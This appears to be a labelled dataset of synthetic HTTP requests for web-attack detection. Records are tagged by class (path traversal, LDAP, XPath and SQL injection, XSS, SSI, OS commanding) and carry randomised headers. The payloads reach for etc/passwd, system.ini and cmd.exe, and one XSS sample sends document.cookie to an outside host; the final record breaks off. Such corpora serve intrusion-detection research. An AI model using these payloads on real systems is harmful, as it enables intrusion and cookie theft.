Proxy-Authorization: mnACee jh2try=tf8qepe7
Authorization: Digest opaque="rnqf"
Referer: http://www.tqcosth.it/pnton/ahAC.aspx
Trailer: TE
User-Agent: Mozilla/4.9 (X11; U; Unix 4.1; ho-El; rv:1.0.2) Gecko/66597739
UA-OS: Linux
UA-Pixels: 4111x1385
Via: 2.5 www.r7cejt.shtml, FTP/8.1 www.eSfjt.jpeg:29, ZT0e/7.6 www.nieae.css
Transfer-Encoding: hkHet; gnohn=gakvc7cs
X-Serial-Number: 323144017545
----: ----------

null

End - Id: 35421
Start - Id: 46243
class: PathTransversal
GET /sciYmbrBXkZWIwDOWphU/nFG9e6n6ud/n0T/e2WNKN0rmSUXqpw.WyxO/alt4ereT/aizbo3T39soy9hqt.jsp?uhucxgg=xnli0rddrr&pfisnpe92hfpuem=0232&o0p8t=MrstOah29ea4moiIe&4oR=A%29ucewec%27r5hua&yCOE4f5=5db+s&lmzotgesdko=4268&tenea=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Naee1emtu4=%5D3&nRtnwp=14237632&tnesadraeiem7av=6&fgc8yu9Z=rctUfie&vRIiGdNLLw5C=55623186&Luad8ht5Gr=10601&tadtoaup=tAre+hta9voighE HTTP/1.0
Host: 230.250.32.104
Connection: eeiee3
Accept: application/*, audio/basic;q=0.2, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.9, compress, gzip, identity, compress;q=0.9
Accept-Language: LhV-Oen1m, 2c-fc;q=0.2, oiviw-oh7ms;q=0.1
Cache-Control: max-stale
Client-ip: 231.150.7.86
Cookie: IweLJP@JheFscript=en8lG2ii
Cookie2: $Version="99"
Date: Mon, 03 Sep 07 06:49:07 GMT
ETag: W/"4GaIFePkNWXt7fmQSf7"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Tue, 24 Nov 09 19:46:52 UTC
If-Unmodified-Since: Wed, 28 Apr 10 07:27:19 UTC
If-Match: *
If-None-Match: "PmHPHY07tXbggcjo2j"
If-Range: Wed, 14 Sep 05 21:20:58 UTC
Max-Forwards: 96
MIME-Version: 1.9
Pragma: z1xn5hue='da'
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: NTLM bm92ZW9vc29lb3lyaWVMbnNiZW5saWVqdG5hMnFBbWVjNm50Y2U5Y2lpUnVoYXBy
Range: 56-3,6-
Referer: /sasi.html
TE: deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: etd3htrpyl7ttlts
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 4.6 92.187.75.43, 6.7 www.atet3Oe.html, HTTP/5.1 www.a1tnDbu.html
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 211.19.211.211
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46243
Start - Id: 36939
class: LdapInjection
POST /eocRdteaanv/xddali7cwe7ikB/l2El/vtfn/j7jUXpQDPgH8G/ene8dAi/positionQXUC@wc8v6W.png? HTTP/1.1
Content-Length: 283
Content-Language: mh,s
Content-Encoding: identity
Content-Location: http://y6is.de/nedrrih5.aspx
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Jul 06 06:29:07 CET
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: www.hwttJnler.ch:580
Connection: close
Accept: image/*, application/rtf;q=0.1, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.5, deflate;q=0.3, deflate;q=0.5
Accept-Language: lGsok-sttElwhe;q=0.3, 9opulge-i, astnei8-unE, sj-yfhhe
Cache-Control: only-if-cached
Client-ip: 162.69.97.25
Cookie: cgnoh3isanu=2t+pti4 5n1eyv;N0U8dYoKEe=2039;Omy=jEbody-tc;vZdmthvprocessing-instruction=26;WkWFtF_bGT=586473;gjsdouu=relinktsnnph-]aaobjecte
Cookie2: $Version="76"
Date: Fri, 08 Dec 06 12:18:43 GMT
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 17 Apr 07 21:06:11 UTC
If-Unmodified-Since: Fri, 13 Aug 04 23:34:59 UTC
If-Match: "Dk07Hk.Msl2S8Wbl"
If-None-Match: "ONA2@F2ihExyREdCQx"
If-Range: Thu, 02 Oct 08 06:01:54 UTC
Max-Forwards: 8212
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: seuwi5 ehaono9=LEtah6
Authorization: Digest nc=ceFf0a42
Range: 060649-
Referer: /ts6Rire/ueokLa/e6hmos0/t0oru/neigmur.gif
TE: trailers
Trailer: If-Modified-Since
User-Agent: jkiiiiM/5.7.5.7.6
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 3.6 www.xA9pday.htm, 9.3 55.246.11.155, 3.7 www.ifhiae.jpg
Transfer-Encoding: identity
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CiacceptHXk=cmdRt4d&gdfdeval3aR=aYlFTglWCk5A&oileeitye=rba&BD5mbwMssy=wl4usr11ainputh  Qpse&sleme=35&co=m pP&VnGs.processing-instruction=83434386&d8hortr9a8st=2502&rei=99)(&(objectClass=oee)(|(sn   =  onak)(cn=Zblr J*))&2afiuaorlsnnhrh=eAcxg&tdocdu=1755

End - Id: 36939
Start - Id: 45916
class: PathTransversal
GET /oXCZ4dvgfE3uB2/aaAk/pJk6JCix/7iogue4AcNPdiTMj_vFs/rU9Ct9C5L/eZkPm54sFF.php4?tdseth3tlrtaH=%5Cautoexec.bat&ytbjov6=s4toa&a4=46 HTTP/1.1
Host: 133.179.246.228:4845
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 90.133.156.2
Cookie: HEiso=gkj3;j5PY9x1IC=en=>
Cookie2: $Version="230"
Date: Tue, 16 Mar 04 17:50:50 UTC
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: 1otir2s@koloJtr.com
If-Modified-Since: Mon, 24 Jul 06 14:41:11 CET
If-Unmodified-Since: Sat, 08 Oct 05 07:28:07 UTC
If-Match: "uNs44YLwif8QZFBm"
If-None-Match: "7eDkmWR0e_oJS55"
If-Range: *
Max-Forwards: 584
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: NTLM MnQybG5hMkN0c3JrbE9lZXJzc3VlaGJ0NWFzNWRlTmxtMmhheWllZ25ub2E=
Range: -106180,0973-,3598-
Referer: /btOad/nhset/nroxfw8j.wmn
TE: deflate
Trailer: TE
User-Agent: 2novfp/1.5.0
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/3.4 www.r9rld09u.htm, 2.0 www.giOe.tiff
Transfer-Encoding: gzip
Upgrade: dhvol/0.8, Pde/4.9
Warning: 095 56.21.175.106:259 "l0gwyrihdtorxlLesCEm" "Thu, 01 Mar 07 09:16:13 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45916
Start - Id: 38185
class: LdapInjection
GET /YnsaarsttcTaPrz/bTSR/d2jqD0dtk6n6@9o/8v/n9LxGsQC1m/uOzn3OL/w37nzervmwetlior/sjovrI3j3pPlPxhLj8a_/h6t7ianaue/kFdh3/n6haiEiexsiRc/PUHiFlp2Amail.bin?ertnh7mpcdzntel=itite5lkht&Sneph=ktrt%29%28%26%28objectClass%3D++aatb*%29 HTTP/1.1
Host: www.etjrb.de
Connection: keep-alive
Accept: image/gif
Accept-Charset: iso-8859-2, macintosh
Accept-Encoding: *;q=0.1
Accept-Language: am-3i, hh-widyl1, adDpjlu-6j;q=0.7, Ad-msnNL;q=0.3
Cache-Control: min-fresh=42
Client-ip: 238.249.58.159
Cookie: hwcuyaoeots5= hy;hrr2enaspmsW=ty
Cookie2: $Version="7"
Date: Thu, 29 Nov 07 21:22:13 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Thu, 31 Aug 06 21:36:03 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: "PCpCyEr4wBxZbGeJS"
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: *
Max-Forwards: 19
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: rlgd pkAree=ohoel
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: /pphsqax.cfm
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: htntoiyfm/1.9.9.2.1
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38185
Start - Id: 49363
class: XPathInjection
GET /rT1-rKlG/eaRl80AmY7anIjqoItiH/Oouioh2hhee7oqi/l1ImdfnCS0/r8/nzh/FGH0d%ubRhtpass/eadnbae/2BsmhorEBMH59z.exS/aomCpkbPkP_@WusDuu/QGrhybnc/jso5ps.dll?9nustmespre=iec%28&yorzspEr=tirol7i31w9&pisw=l+drl&ruweNdf=0497047752&clQcQs9AadminmN=eemevntdm706h4&0M5l=yNe%27++++or+6+++++%3C+++count%28path%2Fchild%3A%3A*%29+++or++%274091d9h%27%3D%27&itllbonleapcet=902370 HTTP/1.1
Host: 0.135.61.253
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=19
Client-ip: 30.6.154.223
Cookie: eAr=3;hbath9sgr5soe=hqt1@-tSuyCH
Cookie2: $Version="93"
Date: Wed, 03 Dec 08 03:48:06 GMT
ETag: W/"FIu26wuEFt-BFu-vr"
Expect: 100-continue
From: deodan@edhI.net
If-Modified-Since: Mon, 15 Mar 10 13:03:58 CET
If-Unmodified-Since: Fri, 10 Oct 08 06:00:11 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7189
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: gEen je4f=me70Ymri
Range: 8044-09,976-
Referer: /dhizr/cd1w/aNja/qioko.mspx
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 9.4; nh-dr; rv:4.2.7) Gecko/36933607
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 396x142
Via: 7Ebau/2.5 108.53.127.40, 9.2 www.eatkmm.shtml:8
Transfer-Encoding: compress
Upgrade: wsem/7.8, MtRxo/3.9, i75/3.8, tecnp/1.2
Warning: 935 246.135.154.171 "wpboie" "Tue, 30 Jun 09 03:56:30 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49363
Start - Id: 35569
class: XPathInjection
POST /wutehntzqM3ttai/frQhvTAD6Hf/veearks8wvumEmooenNs/me/pVHrV6XOM1JQ3iS6/tfform6EDxterm-XXKexec.html? HTTP/1.1
Content-Length: 132
Content-Language: pOencle
Content-Encoding: deflate
Content-Location: http://www.t6tlh.be/Hihat/Iusiil/dheiu/ae7mpe/seetah.php4
Content-MD5: dFRyeW91YWhoZFVuYXJlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Jan 05 07:00:56 CET
Last-Modified: Wed, 12 Sep 07 06:52:20 GMT
Host: www.omrteeRo.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258, isiri-3342;q=0.7, iso-8859-8;q=0.2, cp-936;q=0.3, x-mac-korean;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=46
Date: Thu, 14 Feb 08 23:22:10 UTC
Expect: n4hotni
From: Cyogw@iHT4nAcE.st
If-Modified-Since: Wed, 29 Nov 06 17:35:54 CET
If-Unmodified-Since: Mon, 18 Jul 05 18:38:03 CET
If-Match: *
If-Range: "FgdN5eUc4Q-yS@HkQ"
Max-Forwards: 165
Pragma: no-cache
Proxy-Authorization: Basic ZkxpYW86bXR5OWh1Mg==
Authorization: NTLM bW9ldHN2cmUwc0lzbXJtYXpyY2Flcm56b2V0OWVEbkxyRXNUY0F4
Referer: /o8niynbr.pdf
TE: gzip;q=0.3,trailers,deflate
Trailer: Accept
User-Agent: IVDt (nQSQanVg; hE5XkLSW; sH4f@-FR)
UA-CPU: Sparc
UA-Disp: 6739,3427,32
UA-Color: color16
UA-Pixels: 101x5961
Via: 4.0 www.rdoac.shtml
Warning: 503 www.2ereIoft.tiff "stHrxpgsdfyTd3soor" 
----: ---------------

allr9lnhnC=n4pter'    or     path/child::node()[position()=N] or   'ermtn'='&rdaztq=rin2qeNroddlheaAmk

End - Id: 35569
Start - Id: 35311
class: SqlInjection
GET /X3NF08CH0/edvDKIf-FG83@vm4g.oM/ud0ott4/svuMQ/eywhiuyae5naeir/etnYaraEjs/hHFF/eSwu7zOYU231a-POj.php3?ofMvaezdnpt3ec=0slRh&bdqurheDleahltT=taOhmma&HVS@@DA=%27+++OR++%27smaliiE189v%27+++BETWEEN+++%27R%27+AND+++%27T&vtor2lI1ahDo=Ninsg3m9%3Fu1tyfGeo&azrpac=%26t HTTP/1.0
Host: www.hoir9ea.com
Connection: to8epb
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: thms-rr, xsec1-nteeie;q=0.3, EhnaNdti-vlxfhghc, tinn4teu-io;q=0.4, 1rs-ndjnli;q=0.6
Cache-Control: only-if-cached
Client-ip: 94.110.74.242
Cookie: WtsriFa9e=oaade;glAemrsgoxiri=oahd?ciDe;atntutelB=reoaotraxw;erh47lsh=nv;AmaeVs=eea=pdx ytsamaallgd
Cookie2: $Version="28"
Date: Wed, 07 Sep 05 07:25:49 CET
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: qleceo=dsstvain;uas2soO=vedesi
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Mon, 10 Aug 09 21:42:18 CET
If-Unmodified-Since: Sun, 25 Jul 04 14:04:43 CET
If-Match: "UZcdnfx8.OFJUnD"
If-None-Match: *
If-Range: *
Max-Forwards: 180
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Basic bmVvd25nZTo2YWFlZWxk
Range: 414018-,3-
Referer: http://tGAk.ch/hmneEh3u/elaeo4fl.pdf
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (Windows; U; WinNT 8.5; tf-Eq; rv:6.5.3) Gecko/14689746
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 198x9357
Via: 3.3 100.195.92.131, FTP/9.9 www.oshtcnx.css
Transfer-Encoding: gzip
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 8712797310669
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35311
Start - Id: 47938
class: XSS
GET /luUyTddc/rFMh4h6cD@W0/eMcdaq00TtcretbaR/l4wy/yRFUznm/n@Hp-i7t.html?rsn=lstg&QhlinsertN=85&dahak9e3Sihsr2t=335467559&dGFW-1OZf=%3Cbody+++++onload++%3D++%22++%5Balert+++%28%27nrey%27%29%3B%5D+++++%22+%3E&1pawpognairAs=6owristyletjlsnn&s8jMe=emmoatne6&helh5oyohi=559249&taegdsBih=a%27+ho&ea=euKcVjMl92&onecho3HbU=937346&bgsoundZRnd8ReC-=7niv+wr3heuoo&pxGb=lidt5&aaaoshE9eCtle=ln7SMt6ZFx&nulVhh3pui=75 HTTP/1.1
Host: www.hexthgti.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.0
Accept-Language: on6g-d;q=0.4, 3tnnTn17-aa;q=0.3, moiwuSD-uiIn;q=0.7, h-a;q=0.6, twr0npn-rws
Cache-Control: min-fresh=04
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Mon, 12 Sep 05 17:40:07 UTC
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Sat, 11 Mar 06 13:23:55 UTC
If-Unmodified-Since: Tue, 06 Jun 06 23:18:59 CET
If-Match: "WakgD6qPo_P.mOy6q."
If-None-Match: *
If-Range: "dui5KMZulNUq4Bq8v7vG"
Max-Forwards: 003
MIME-Version: 2.0
Pragma: l5E='6sos'
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: Basic ZGEydGZ1ODpydWxnYXV5
Range: 986919-,798-764614
Referer: http://www.mTtdo.be/ipwortt.cfm
TE: trailers,trailers,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: dIcl_1k3v http://www.elee.st
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 929x206
Via: casA3e/9.5 www.eafpos.jpg, 6.6 87.216.24.52
Transfer-Encoding: fL6YG
Upgrade: revs/4.9
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47938
Start - Id: 36009
class: PathTransversal
PUT /tc2bIUxC7yp2LCgYT/tr0rte7ug5m/stibw3en6/3vVDi64@eH.w@4L/led/zzWzIbL/f.q/9QkKff0j.bin? HTTP/1.0
Content-Length: 335
Content-Language: N14eied,dt,a
Content-Encoding: identity
Content-Location: /dgnc8ni/CeeQeEr.wmn
Content-MD5: a2hoaHJ0bkFsaWVhbmVvYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 12 May 08 08:34:46 CET
Host: 29.152.101.135
Connection: uaeeteon
Accept: */*;q=0.1
Accept-Charset: windows-874, koi8-r, gb2312, euc-tw
Accept-Encoding: 
Accept-Language: toaxjmu-LsL
Cache-Control: no-transform
Cookie: dcgpeks=820727;oesl=sr|3d;scBaonEao=sy1mH0Y7f;rctnidQsasn=e46irt2aii;2co5pEti=fir;RrWUs=3932897
Cookie2: $Version="7"
Date: Sun, 27 Dec 09 08:12:33 GMT
From: snploe@2Ooln.biz
If-Modified-Since: Wed, 24 Oct 07 01:30:32 UTC
If-Unmodified-Since: Fri, 23 Jan 09 23:07:04 CET
If-None-Match: *
If-Range: *
Max-Forwards: 056
Pragma: 73='h'
Referer: /HsPhtd/9ttp0R/Nivl/fdutun/aersApr.sh
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 0.8; ha-4r; rv:8.9.2) Gecko/54997593
Via: 9.1 www.jcnsru9.png:3250, 6.7 121.9.5.186
Transfer-Encoding: compress
Warning: 658 108.103.139.154 "Iuht" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e9lt=q4>3ae eehfcpm$l;hqx&eelartskoct9=rlHTP&0a1soe8Lilee=964HlxZc34&jiooehlC0snid=../../../../../../WINDOWS/autoexec.bat&ehtAhczual4=dynYi&TLxOUqprocessing-instructionE=engFv&uttp9fa3leCed=212516&t4ib=6&8uYb59Og=d&rnttwuakf=iKerhrsnryjastAu&wi1mt=ojR+iheoi3ri;uas&o27l=St&uKAacatwhereJ=443678&Sttbrdlmle6i8k=bj

End - Id: 36009
Start - Id: 40443
class: SSI
GET /i3qB4XwyZ_ilXFG3au/paZ4/CajBpeeiog/fT2/derttmuatpzitc5i/yoVNpsvehohettsns/gcmd8.gif?h8o1vKUy=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&icszif=470&thbslg=ancdtc&tASiHE=8273065&tegmkie=aetHsaAhOI&@RiQ=00&EsEeregmiphkzut=m%25o+daoT&GwP-G-0FVWx=Nei%3Bechocmdi HTTP/1.0
Host: www.y0eets.net
Connection: close
Accept: image/*;q=0.0, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=8685
Client-ip: 128.123.101.76
Cookie: ikry71rli=peoma3eEcf4leb
Date: Sun, 14 Oct 07 04:59:03 CET
ETag: W/"w_7cEQg3_Tkt1w70Xs"
Expect: 100-continue
If-Unmodified-Since: Wed, 15 Nov 06 03:21:44 GMT
If-None-Match: "@EO4WXr6dVVvBAVQgOF"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3973
MIME-Version: 3.0
Pragma: tr6=herlavt
Proxy-Authorization: rwn3u idctraIi=sRc7
Authorization: Digest nonce
Range: 53605-7014
Referer: http://usikrB.de/ehaeei/m60or/eehwa/tmiMiio/mtarwwp.bin
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Hrnt7r45/8.2.1
UA-CPU: x86
UA-OS: Windows 95
UA-Color: color8
Via: HTTP/8.5 237.208.218.3:41
Transfer-Encoding: compress
Warning: 424 www.ivstiAcN.shtml "Koasse" 
X-Forwarded-For: 211.36.21.124

null

End - Id: 40443
Start - Id: 44306
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 255.34.242.39
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.4
Accept-Language: *;q=0.3
Cache-Control: Iwd='tannt'
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="16"
Date: Thu, 04 Mar 04 17:30:54 UTC
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Fri, 24 Oct 08 09:28:15 GMT
If-Unmodified-Since: Sat, 31 Oct 09 22:44:50 CET
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: NTLM dDljZDVuZEppbXBlbG55ZHJ0ZXVpdHU0aXJEbXVwc29heG90d0tQZ2VlZFc=
Range: 3-
Referer: /osqr/hBblOk8l/oe6es0o/ciuLuplr/rdiaui.asp
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: lGbyuDDdA http://www.pmedct.cz
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: 4.5 www.dtis0.html, 5.4 5.133.130.32
Transfer-Encoding: identity
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44306
Start - Id: 37057
class: LdapInjection
GET /cs-a8O/hOr/ay_O_9/tAS/5kdPcu/deT_9n2/uR9BTRl.htm?utft9=7693493&OKQptmp=9648&egt=%29++++%28++%7C++++%28dgL%3Dyooar*%29 HTTP/1.1
Host: 134.172.31.98:80
Connection: close
Accept: audio/*
Accept-Charset: x-mac-chinesesimp;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 52.88.110.99
Cookie: ule=tsgLrwr
Cookie2: $Version="68"
Date: Tue, 30 Oct 07 11:26:41 UTC
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 02 Oct 05 02:56:45 CET
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 54
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic bWFyczpzcm9hb3B1
Range: 03242-,-0
Referer: /ep5eet31/oeSystea/atTainai/l6hm.dll
TE: gzip;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/3.6 (X11; U; Open BSD i386 4.0; e1-yf; rv:3.9.0) Gecko/56053450
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/6.2 www.OpSNh.js, HTTP/7.7 151.99.94.185:30
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37057
Start - Id: 40364
class: SSI
GET /36tmpUPX6r/3WZ6hlp8yJ.8vYWKBah/tbs0ediyro6.tiff?Bi6uee=n4htacceso&Gwrg=6moEytdfkira9eh5&2zxmld=edr&ei9wsyrteiihoae=documentEe+-owEbtae8i HTTP/1.1
Host: 70.170.234.244:20
Connection: keep-alive
Accept: audio/basic;q=0.2, video/*
Accept-Charset: iso-8859-9, iso-2022-jp
Accept-Encoding: <!-- #include virtual="d:\windows\autoexec.bat" -->
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.157.138.19
Cookie: wwj77a=sjt2A>hWCa;teminleh6=2208;nw3f1fenua=2
Cookie2: $Version="1"
Date: Mon, 11 May 09 01:00:00 UTC
Expect: nRhaokrh
If-Modified-Since: Sun, 17 Aug 08 19:43:44 UTC
If-Unmodified-Since: Tue, 20 Jul 04 02:38:01 UTC
If-Match: "qNfplCPrTBYdmDL-o8"
If-Range: "xv5ccaXIX1zi95Ay"
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZDluaWdkcFdhb3djZGlnTzFvbTFsYXdoY2FhZWVjY3NwYVM=
Referer: /gaaih/ciiuest/lho7xlGs.wmn
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 0.2; a2-wT; rv:8.8.4) Gecko/74539292
UA-OS: FreeBSD
Via: 8.2 www.etYe.html, 5.3 www.orotd.htm, 2.4 www.sogh7.jpg

null

End - Id: 40364
Start - Id: 47197
class: XSS
GET /kYv7SoL@0PY_CpR/sj_PoYrXgN.2.png?mesdr6inN=494&U7umclthetw=kLu&ipmn=%3Cimg++++src+%3D+++%22+stletaon++++%22onmouseover++%3D%22+++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.onal.com%2Fcgi-bin%2Ftr.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E&rceNdhehhyds=5 HTTP/1.1
Host: 66.97.172.59
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=892
Client-ip: 34.140.216.85
Cookie: iarbsitmelUo=52;eddhS=4vF;JOnullx=87012;CDpjN=933017345;da=dztcedi;RP0uW9b=3111564
Cookie2: $Version="4"
Date: Sat, 01 Dec 07 09:00:01 CET
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: c8RTppe
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Sun, 05 Sep 04 10:38:30 GMT
If-Unmodified-Since: Sun, 12 Jun 05 13:30:07 CET
If-Match: *
If-None-Match: *
If-Range: "TzOgKWybZzxCQLcAoEV"
Max-Forwards: 666
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Eoowor ittlI=ENebi
Range: 62-80366,-217,68-
Referer: http://uhieby.net/te53/hgevk/fiy6.cfm
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (X11; U; Open BSD i386 4.1; dg-ge; rv:7.1.5) Gecko/48712917
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 95
UA-Color: color8
